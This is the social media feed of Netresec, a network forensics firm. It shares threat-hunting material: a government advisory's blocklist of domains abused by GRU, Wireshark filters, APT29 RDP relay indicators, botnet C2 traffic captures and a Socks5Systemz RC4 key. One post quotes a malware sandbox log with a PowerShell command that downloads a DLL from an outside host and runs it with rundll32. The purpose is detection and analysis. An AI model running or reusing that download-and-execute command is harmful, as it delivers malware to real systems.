𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲
LightNews LightNews
banner
netresec.com
𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲
@netresec.com
720 followers 240 following 62 posts
Experts in Network Forensics and Network Security Monitoring. Creators of #NetworkMiner, #CapLoader, PacketCache, #PolarProxy and RawCap.

Website: https://www.netresec.com/
Mastodon: @[email protected]
Posts Replies Media Videos
netresec.com
Thank you CISA, @ncsc.gov.uk, @bsi.bund.de et al. for publishing the advisory on Russian GRU Targeting Western Logistics Entities and Technology Companies. This list of mocking services is great for threat hunting!
www.cisa.gov/news-events/...
Many organizations may not need to allow outgoing traffic to hosting and API mocking services, which are frequently used by GRU unit 26165. Organizations should consider alerting on or blocking the following services, with exceptions allowlisted for legitimate activity [D3-DNSDL]. *.000[.]pe *.1cooldns[.]com *.42web[.]io *.4cloud[.]click *.accesscan[.]org *.bumbleshrimp[.]com *.camdvr[.]org *.casacam[.]net *.ddnsfree[.]com *.ddnsgeek[.]com *.ddnsguru[.]com *.dynuddns[.]com *.dynuddns[.]net *.free[.]nf *.freeddns[.]org *.frge[.]io *.glize[.]com *.great-site[.]net *.infinityfreeapp[.]com *.kesug[.]com *.loseyourip[.]com *.lovestoblog[.]com *.mockbin[.]io *.mockbin[.]org *.mocky[.]io *.mybiolink[.]io *.mysynology[.]net *.mywire[.]org *.ngrok[.]io *.ooguy[.]com *.pipedream[.]net *.rf[.]gd *.urlbae[.]com *.webhook[.]site *.webhookapp[.]com *.webredirect[.]org *.wuaze[.]com Heuristic detections for web requests to new subdomains, including of the above providers, may uncover malicious phishing activity [D3-DNRA]. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims.
May 22, 2025 at 5:16 PM
netresec.com
NetworkMiner automatically extracts EML files as well as attachments (here a jpg image) to disk when it parses emails in SMTP, POP3 or IMAP traffic.
JPG and EML files extracted from SMTP traffic by NetworkMiner 3.0
May 6, 2025 at 6:25 AM
netresec.com
That's a very useful feature! Thanks for sharing 🙏
Setting capture.pcap_ng to FALSE in Wireshark's Edit, Preferences, Advanced let's you save capture files as .pcap instead of .pcapng as default.
February 24, 2025 at 10:20 AM
netresec.com
Here's a Wireshark display filter that detects this type of LLMNR (multicast name resolution) spoofing:

dns.​count.​answers > 0 and lower(dns.​qry.​name) != lower(dns.​resp.​name)
dns.​qry.​name should have the same value as dns.​resp.​name Here's a Wireshark display filter for you: dns.count.answers > 0 and lower(dns.qry.name) == lower(dns.resp.name)
January 29, 2025 at 3:09 PM
netresec.com
#DirectoryTraversalMemes
Original source: https://infosec.exchange/@cR0w/113239726857971779
December 18, 2024 at 6:14 PM
netresec.com
APT29 / Midnight Blizzard / Earth Koshchei use RDP relays to gain control of victims’ machines. One RDP config pretends to be for Regeringskansliet (Swedish Gov).
Thanks to @feikeh.bsky.social and @sjhilt.hilt.zip‬ for sharing indicators!
www.trendmicro.com/en_us/resear...
tria.ge/241023-qpfnl...
Rogue Remote Desktop connection claiming to connect to Regeringskansliet, but actually connects to eu-north-1-aws.regeringskansliet-se.cloud
December 17, 2024 at 3:47 PM
netresec.com
The dropped bot (which?) uses the NKN peer-to-peer network to hide its C2 traffic.
Host: seed.nkn.org:30003 User-Agent: Go-http-client/1.1 Content-Length: 134 Accept-Encoding: gzip {"id":"nkn-sdk-go","method":"getwsaddr","params":{"address":"__2__.8d55d3be9867581250721dd4dba13acb76a113c8ad090c4f23c154674d9f3f19"}} HTTP/1.1 200 OK Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept Access-Control-Allow-Origin: * Content-Type: application/json;charset=utf-8 Date: Fri, 06 Dec 2024 07:48:34 GMT Content-Length: 264 Connection: close {"id":"nkn-sdk-go","jsonrpc":"2.0","result":{"addr":"68.183.143.43:30002","id":"7449dac533bab78986ba368ff4e2c13cac3ae1d2a7943a15699ec7e25de25627","pubkey":"25446e194c6a503e4e12e227ef4c9643e0a5294f57aeff28d25e3fb0bc06eee3","rpcAddr":"68.183.143.43:30003","sdp":""}} GET / HTTP/1.1 Host: 165.22.125.92:30002 User-Agent: Go-http-client/1.1 Connection: Upgrade Sec-WebSocket-Key: oncP0NxUUFQOV3f2P5uFbA== Sec-WebSocket-Version: 13 Upgrade: websocket HTTP/1.1 101 Switching Protocols Upgrade: websocket Connection: Upgrade Sec-WebSocket-Accept: HLm8mbMzh6aWhDUQWyg7H4gBMr4= ?~.?{"Action":"authChallenge","Challenge":"f4018d6d1f67d21a425660cf6a15eb351b526b796bf945da9a5a528662858b40","Desc":"SUCCESS","Error":0,"Result":"","Version":1}
December 6, 2024 at 11:24 AM
netresec.com
Downloaded a fresh pcap from any.​run to verify that #CapLoader identifies this traffic as ​Socks5Systemz backconnect ✅
app.any.run/tasks/c1b2dc...
CapLoader alerts on Socks5Systemz backconnect traffic: Malicious protocol Socks5Systemz backconnect 31.214.157.206 2024
December 5, 2024 at 3:35 PM
netresec.com
#Socks5Systemz backconnect traffic now uses TCP port 2024 (previously 2023)
infosec.exchange/@abuse_ch@io...
@abuse_ch@ioc.exchange On the 1st of December, the notorious Socks5Systemz payload server hosted at AS57678 (Cat Technologies 🇭🇰) that is already active for several months started to serve a new version of Socks5Systemz ⤵️ 🌐 https://urlhaus.abuse.ch/url/3189430/ This is the first major change since 2023 in Socks5Systemz and includes: 🔑 New RC4 key used during C2 communication: hi_few5i6ab&7#d3 👋 Direct IP communication through HTTP(s) for botnet command and control instead of the usage of a DGA and a custom DNS server 🔙 Backconnect TCP port changed from 2023 to 2024
December 5, 2024 at 3:35 PM
netresec.com
Same vibe
I love the smell of PCAP in the morning
December 4, 2024 at 11:50 AM
netresec.com
Here's another one with instructions from C2 server to download the next stage DLL.
Initial JS: 61dfc228a478f21326908f0231ff553c
Dropped DLL: c6ef634779facf10516f0dd6d0d1757c
app.any.run/tasks/8831ab...
OS Version: Microsoft Windows NT 10.0.19045.0, Edition: Microsoft Windows 10 Pro, User: admin, Domain: DESKTOP-JGLLJLD powershell -Command "& {Invoke-WebRequest -Uri http://shopping-nice.com/files/adobem.dll -OutFile $env:TEMP\adobem.dll; Start-Process rundll32.exe -ArgumentList '$env:TEMP\adobem.dll,gobayden'}" No output from command.
November 28, 2024 at 9:51 AM
netresec.com
Nice malware lab setup using FLARE VM, #PolarProxy and #REMnux to decrypt and inspect TLS traffic.
www.koenmolenaar.nl/nl/write-ups...
The command I used to run PolarProxy to decrypt my TLS traffic was: sudo polarproxy --terminate --connect 10.10.10.3 -p 443,80,80 --leafcert sign -o . -v This intercepts TLS traffic coming from port 443, decrypts it, and forwards the decrypted traffic to 10.10.10.3:80 (My Remnux VM IP), where it is caught by INetSim’s HTTP Listener and logged. It also writes a PCAP to the local directory containing the decrypted traffic as if it was directed at port 80.
November 28, 2024 at 9:20 AM
netresec.com
Two new Network Forensics training events!
🇪🇺 PCAP in the Morning Europe, March 4-7
🇺🇸 PCAP in the Morning US, March 25-28
netresec.com?b=23C9979
PCAP In the Morning March 4-7 & 25-28
February 6, 2024 at 4:23 PM